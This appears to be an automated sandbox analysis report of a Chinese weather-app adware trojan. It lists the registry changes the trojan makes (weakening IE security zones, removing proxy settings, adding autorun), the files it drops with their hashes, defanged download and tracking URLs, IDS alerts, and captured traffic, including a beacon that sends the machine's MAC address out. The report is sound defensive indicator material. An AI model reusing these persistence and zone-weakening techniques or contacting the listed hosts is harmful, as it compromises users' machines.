"collection" = "%Documents and Settings%\%current user%\Favorites"
"menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\worldweather.exe]
"desk" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "28 C8 58 59 01 0D 26 67 C6 D4 CD 56 D0 F1 31 08"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\worldweather]
"URLInfoAbout" = "http://weather.22pk.cn/"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\worldweather]
"Publisher" = "´óÖÚÌìÆø¹¤×÷ÊÒ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\worldweather]
"5.0.0.5002/worldWeatherRealTime5002.exe" = "worldWeatherRealTime5002.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\worldweather]
"DisplayVersion" = "5.0.0.5002"
"DisplayName" = "´óÖÚÌìÆøÔ¤±¨ 5.0.0.5002"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"worldweather5002" = "%Program Files%\worldweather\5.0.0.5002\worldweather.exe /autorun"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process greendou.exe:2332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Size" = "10"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32]
"(Default)" = "%Program Files%\Internet Explorer\IEXPLORE.EXE"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"InitHits" = "100"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014052120140522]
"CacheRepair" = "0"
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014052120140522"

[HKCU\Software\Microsoft\Internet Explorer\International]
"W2KLpk" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@shell32.dll,-12693" = "Favorites"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Enable" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014052120140522]
"CachePrefix" = ":2014052120140522:"
"CacheLimit" = "8192"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Factor" = "20"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014052120140522]
"CacheOptions" = "11"

[HKCU\Software\Microsoft\Internet Explorer\Main\WindowsSearch]
"Version" = "WS not installed"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 43 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 FA 27 E4 8E F2 CA 1A E9 7F BA C9 35 C8 42 B9"

[HKCU\Software\Gie]
"update2" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Disable Script Debugger" = "yes"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013041520130416]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013040820130415]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"

[HKLM\System\CurrentControlSet\Services\Tcpip\Performance]
"Error Count"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

The process PM10.5002.exe:2384 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 EF DD 9A 1E ED E3 08 5C E7 42 AF 77 7F BA A0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

The process worldWeatherRealTime5002.exe:1344 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A 55 DA 11 F3 29 B0 38 15 14 D0 31 84 35 EF 8E"

[HKCR\AppID\worldWeatherRTP.EXE]
"AppID" = "{C75ABB58-E428-4F54-A75E-39E1905088A4}"

[HKCR\AppID\{C75ABB58-E428-4F54-A75E-39E1905088A4}]
"LocalService" = "worldWeatherRealTime5002"
"(Default)" = "worldWeatherRTP"

The Trojan deletes the following value(s) in system registry:

[HKCR\AppID\{C75ABB58-E428-4F54-A75E-39E1905088A4}]
"LocalService"

The process %original file name%.exe:1956 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Â̶¹ä¯ÀÀÆ÷]
"DisplayName" = "Â̶¹ä¯ÀÀÆ÷ 1.0.0.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Â̶¹ä¯ÀÀÆ÷]
"Publisher" = "ico237"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Â̶¹ä¯ÀÀÆ÷]
"DisplayVersion" = "1.0.0.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

Dropped PE files

MD5 File path
1eca983679d2f2760f15fc79a6a294ca c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\365weatherIns_61.exe
99f345cf51b6c3c317d20a81acb11012 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf5.tmp\KillProcDLL.dll
e4ec95271ff1bcebab49bdfed6817a22 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf5.tmp\SkinBtn.dll
00a0194c20ee912257df53bfe258ee4a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf5.tmp\System.dll
50fdadda3e993688401f6f1108fabdb4 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf5.tmp\inetc.dll
a7d710e78711d5ab90e4792763241754 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf5.tmp\md5dll.dll
ab73c0c2a23f913eabdc4cb24b75cbad c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf5.tmp\nsDialogs.dll
480f41c61ef59b1dbde50427b3d095b2 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf5.tmp\nsWindows.dll
50fdadda3e993688401f6f1108fabdb4 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp2.tmp\Inetc.dll
a7d710e78711d5ab90e4792763241754 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp2.tmp\Md5dll.dll
a5f8399a743ab7f9c88c645c35b1ebb5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp2.tmp\NSISdl.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp2.tmp\System.dll
9b54944ce476591d65288b0701a52c46 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp2.tmp\nsRandom.dll
0a4fa7a9ba969a805eb0603c7cfe3378 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp2.tmp\processwork.dll
76d2faad042161f24b6c9c78de3bd265 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp2.tmp\xID.dll
0600be4459db030785c2d61ab8ea4de0 c:\Program Files\greeou\GreenDou.exe
1ec57595ea72f47d328acb5fa13aa6f9 c:\Program Files\worldweather\5.0.0.5002\AQI.5002.exe
af9dc00391e568586f6e045c0d80ec58 c:\Program Files\worldweather\5.0.0.5002\PM10.5002.exe
3ae2ae19da4de10a41f631e0cd59464d c:\Program Files\worldweather\5.0.0.5002\PM25.5002.exe
f41b53208000678976ec71d4574dcfa3 c:\Program Files\worldweather\5.0.0.5002\mfc5002.dll
f22066ce95253bc57a054623a65eda06 c:\Program Files\worldweather\5.0.0.5002\sqlite3.dll
b81124b08acb34b432fae845335bce99 c:\Program Files\worldweather\5.0.0.5002\sqliteApi.dll
2a4c40c30da6bbccf03928dcb998193c c:\Program Files\worldweather\5.0.0.5002\uninst.exe
f9e2d87db3700c704d8e7fffa0ab8985 c:\Program Files\worldweather\5.0.0.5002\worldWeatherRealTime5002.exe
f44c74c844114fa977315265813afb26 c:\Program Files\worldweather\5.0.0.5002\worldWeatherUpdate.5002.exe
7eab31806313acd8429450e72c294442 c:\Program Files\worldweather\5.0.0.5002\worldweather.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: MeinV
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: Corporation. All rights reserved.
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: Installer Application
Comments: http://45y.3baidu.org
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 81920 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 274432 343752 344064 4.85958 c1fa34d2f49a5ffc17f1a0f08f5d1597

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://lm.beilequ.com/update/365/365weatherIns_61.rar 122.225.100.200
hxxp://sj88.www.web.glb0.ldcache.net/hezi/jm/setup_a7158.rar
hxxp://weather51la.cnzz.alivcd.com/cnzz/weather/5.0.0.5002/tongji/tongji_61.html 122.225.104.211
hxxp://lvdou.300duo.com/ 223.255.145.200
hxxp://lvdou.300duo.com/favicon.ico 223.255.145.200
hxxp://proxy.sogou.com/?22014
hxxp://weather51la.cnzz.alivcd.com/post/ 122.225.104.211
hxxp://weather51la.cnzz.alivcd.com/cnzz/weather/weatherPng/cnzz.html 122.225.104.211
hxxp://img.users.51.la/15909623.asp 117.21.191.223
hxxp://weather51la.cnzz.alivcd.com/cnzz/weather/5.0.0.5002/weatherdata/_61/cnzz.html 122.225.104.211
hxxp://weather51la.cnzz.alivcd.com/cnzz/weather/5.0.0.5002/weatherdata/_61/WeatherContext.xml 122.225.104.211
hxxp://int.dpool.sina.com.cn/iplookup 123.125.29.252
hxxp://int.dpool.sina.com.cn/iplookup/ 123.125.29.252
hxxp://123.sogou.com/?22014 106.120.151.64
hxxp://weather51la.cnzz.uujzy.com/cnzz/weather/weatherPng/cnzz.html 122.225.104.211
hxxp://www.sj88.com/hezi/jm/setup_a7158.rar 202.97.174.68
hxxp://weather51la.cnzz.uujzy.com/cnzz/weather/5.0.0.5002/weatherdata/_61/cnzz.html 122.225.104.211
hxxp://weather51la.cnzz.uujzy.com/cnzz/weather/5.0.0.5002/weatherdata/_61/WeatherContext.xml 122.225.104.211
hxxp://www.xzsky.com/post/ 122.225.104.211
vipimg.51.la 182.236.163.236
www.biso.cc 67.198.240.190
weather.uujzy.com 122.225.203.94


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET DNS DNS Query for Suspicious .com.cn Domain
ET TROJAN Suspicious User-Agent (Session) - Possible Trojan-Clicker
ET POLICY HTTP Request on Unusual Port Possibly Hostile

Traffic

GET /hezi/jm/setup_a7158.rar HTTP/1.0
Host: VVV.sj88.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*



.A....%..A....%..A....%..A....%(.A....%..A....%$.A....%..A....%..A....
%..A....%..A....%..A....%|.A....%x.A....%t.A....%p.A....%l.A....%h.A..
..% .A....%d.A....%`.A....%\.A....%..A....%..A....%..A....%X.A....%T.A
....%..A....%..A....%..A....%P.A....%L.A....%H.A....%D.A....%@.A...S..
........$D...T.J....D$,.t...\$0....D[..@..%<.A....%8.A....%4.A.....
......Z...FastMM Borland Edition (c) 2004 - 2008 Pierre le Riche / Pro
fessional Software Development..An unexpected memory leak has occurred
. ....The unexpected small block leaks are:...The sizes of unexpected 
leaked medium and large blocks are: .... bytes: ....Unknown.AnsiString
..UnicodeString.......Unexpected Memory [email protected][email protected].
[email protected][email protected][email protected]..@.
.J..B...@..(.h..h..h..H .J .z..z..z..:..@..(.h..h..h..h .H(.J(.z .z..z
..z..:...(.h..h..h..h .h(.H0.J0.z(.z .z..z..z..:..@..(.h..h..h..h .h(.
h0.H8.J8.z0.z(.z .z..z..z..:...(.h..h..h..h .h([email protected]@.z8.z0.z(.z
 .z..z..z..:[email protected]..,..l...|...<....x..,..<..D...D....@.
..........,..<....x..........H...9....J.t......:A................!.
.D:A.u..........!.@:A......0..............!...........:A..Q.9....P....
A.t.......:A...................D:A............@:A...=<:A..u.....8:A
[email protected]%.H....<:A.)..J..H..T....0.....g...........#P...0...r.......8
:A......#P...<:A.).......S.......j.h....h....j........tM..(:A.....$
:A..(:A..Q........................... ...<:A. ....8:A...........[.3
..<:A.3.[...=M0A..t=.).=.8A..u j........ZA...3........t.j..l...
<<< skipped >>>


GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: lvdou.300duo.com
Connection: Keep-Alive


HTTP/1.1 302 Object moved
Date: Wed, 21 May 2014 16:13:10 GMT
Server: Microsoft-IIS/6.0
Location: hXXp://123.sogou.com/?22014
Content-Length: 148
Content-Type: text/html
Set-Cookie: daohang=1; path=/
Set-Cookie: ASPSESSIONIDCCQCTBQS=FPCOCFACEMEPNNIINJKPLHCL; path=/
Cache-control: private
<head><title>Object moved</title></head>.<b
ody><h1>Object Moved</h1>This object may be found <a
 HREF="hXXp://123.sogou.com/?22014">here</a>.</body>...



GET /15909623.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://tongji.uujzy.com/tongji.html?5.0.0.5002_id61_md1_os1
User-Agent: session
Host: img.users.51.la

GET /15909623.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://tongji.uujzy.com/tongji.html?5.0.0.5002_id61_md1_os1
User-Agent: session
Host: img.users.51.la


HTTP/1.1 302 Object moved
Date: Wed, 21 May 2014 16:13:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: hXXp://vipimg.51.la:82/go.asp?svid=1&id=15909623&style=9&vpage=http://tongji.uujzy.com/tongji.html?5.0.0.5002_id61_md1_os1&828.046.gif
Content-Length: 299
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>.<b
ody><h1>Object Moved</h1>This object may be found <a
 HREF="hXXp://vipimg.51.la:82/go.asp?svid=1&id=15909623&style=
9&vpage=http://tongji.uujzy.com/tongji.html?5.0%
2E0.5002_id61_md1_os1&828.046.gif">here</a>.</
body>...



POST /post/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.xzsky.com
Content-Length: 137
Connection: Keep-Alive
Cache-Control: no-cache

mac=00-0C-29-3B-DF-2F&soft_id=33&tuiguang_id=C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\365weatherIns_61.exe&yanzheng=f72e066ddb1d94ae63e1d32390e05757
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 21 May 2014 16:13:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.15
0..



GET /cnzz/weather/weatherPng/cnzz.html HTTP/1.1
User-Agent: mfc5002
Host: weather51la.cnzz.uujzy.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 21 May 2014 16:13:33 GMT
Content-Type: text/html
Content-Length: 2
Last-Modified: Wed, 18 Dec 2013 02:33:49 GMT
Connection: keep-alive
ETag: "52b1098d-2"
Accept-Ranges: bytes
OK..



GET /update/365/365weatherIns_61.rar HTTP/1.0
Host: lm.beilequ.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Wed, 21 May 2014 16:03:08 GMT
Content-Type: application/x-rar-compressed
Content-Length: 1038034
Last-Modified: Fri, 21 Mar 2014 05:24:42 GMT
Connection: close
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1H..u)..u)..
u)...&..w)..u)...)...&..d)...6...).../..t)..Richu)..........PE..L.....
:J.................\...........2.......p....@.........................
.`...............................................s.......p............
...................................................................p..
.............................text....[.......\.................. ..`.r
data.......p.......`..............@[email protected]..........
[email protected][email protected]
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
..>[email protected].>[email protected]
...Pr@..}..e..9}[email protected]........ M............U....M....3..
.3..FQ......3..NU.....M..........VT..U.....FP..E...............E.P.M..
[email protected]@..u....E..9}[email protected].}.j
[email protected]@[email protected] ...Pj.h.6B.W..Xr@.
.u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.
;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F..
<<< skipped >>>


GET /cnzz/weather/5.0.0.5002/weatherdata/_61/cnzz.html HTTP/1.1
User-Agent: mfc5002
Host: weather51la.cnzz.uujzy.com
Cache-Control: no-cache
Cookie: city=101010100


HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 21 May 2014 16:13:40 GMT
Content-Type: text/html
Content-Length: 198
Last-Modified: Wed, 16 Apr 2014 09:44:13 GMT
Connection: keep-alive
ETag: "534e50ed-c6"
Accept-Ranges: bytes
a556f5dd20dcbdfb274d34f5c504a160$2d204d39f2faa25896874c01c0135d760$bca
7b8d364fc9c89c96702a19aa47a00$d8099717b5894a1c926de4f6fe36e650$bf60bba
bd09f5e0270f38adbc02d36b0$b982497d26da6f0218296012b54c5ab0....


GET /cnzz/weather/5.0.0.5002/weatherdata/_61/WeatherContext.xml HTTP/1.1


User-Agent: mfc5002
Host: weather51la.cnzz.uujzy.com
Cache-Control: no-cache
Cookie: city=101010100


HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 21 May 2014 16:13:41 GMT
Content-Type: text/xml
Content-Length: 509
Last-Modified: Fri, 21 Mar 2014 04:22:34 GMT
Connection: keep-alive
ETag: "532bbe8a-1fd"
Accept-Ranges: bytes
<html>..<title>........</title> ..<body scroll=no
>..<skin>..<name>skin.xml</name>..<path>htt
p://conf.f.360.cn/status.html</path>..<hash>ffa9975d557f92
25ae0a0eb80212b98f</hash>..<size>0</size>..<type&
gt;0</type>..<cnzz>hXXp://int.dpool.sina.com.cn/iplookup$c
nzz_ID_0</cnzz>..<cfg>hXXp://weather51la.cnzz.uujzy.com/cn
zz/weather/5.0.0.5002/</cfg>..<cfg>hXXp://weather51la.cnzz
.alivcd.com/cnzz/weather/5.0.0.5002/</cfg>..<tqy>AQI.5002.
exe</tqy>..<chx>worldWeatherRealTime5002.exe</chx>..
</skin>..</body>..</html>..



GET /iplookup HTTP/1.1
User-Agent: mfc5002
Host: int.dpool.sina.com.cn
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Date: Wed, 21 May 2014 16:13:47 GMT
Server: Apache
Location: hXXp://int.dpool.sina.com.cn/iplookup/
Cache-Control: max-age=120
Expires: Wed, 21 May 2014 16:15:47 GMT
Content-Length: 246
Connection: close
Content-Type: text/html; charset=iso-8859-1
SINA-LB:aGEuMzguZzEuYngubGIuc2luYW5vZGUuY29t
SINA-TS:OTRjMmRlY2UgMCAwIDAgMyAwCg==
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://int.dpool.sina.com.cn/iplookup/"&
gt;here</a>.</p>.</body></html>...



GET /favicon.ico HTTP/1.1
User-Agent: ...............
Host: lvdou.300duo.com
Connection: Keep-Alive


HTTP/1.1 302 Object moved
Date: Wed, 21 May 2014 16:13:10 GMT
Server: Microsoft-IIS/6.0
Location: hXXp://123.sogou.com/?22014
Content-Length: 148
Content-Type: text/html
Set-Cookie: daohang=1; path=/
Set-Cookie: ASPSESSIONIDCCQCTBQS=GPCOCFACAIEBIMHNEGNIFCFK; path=/
Cache-control: private
<head><title>Object moved</title></head>.<b
ody><h1>Object Moved</h1>This object may be found <a
 HREF="hXXp://123.sogou.com/?22014">here</a>.</body>...



GET /?22014 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
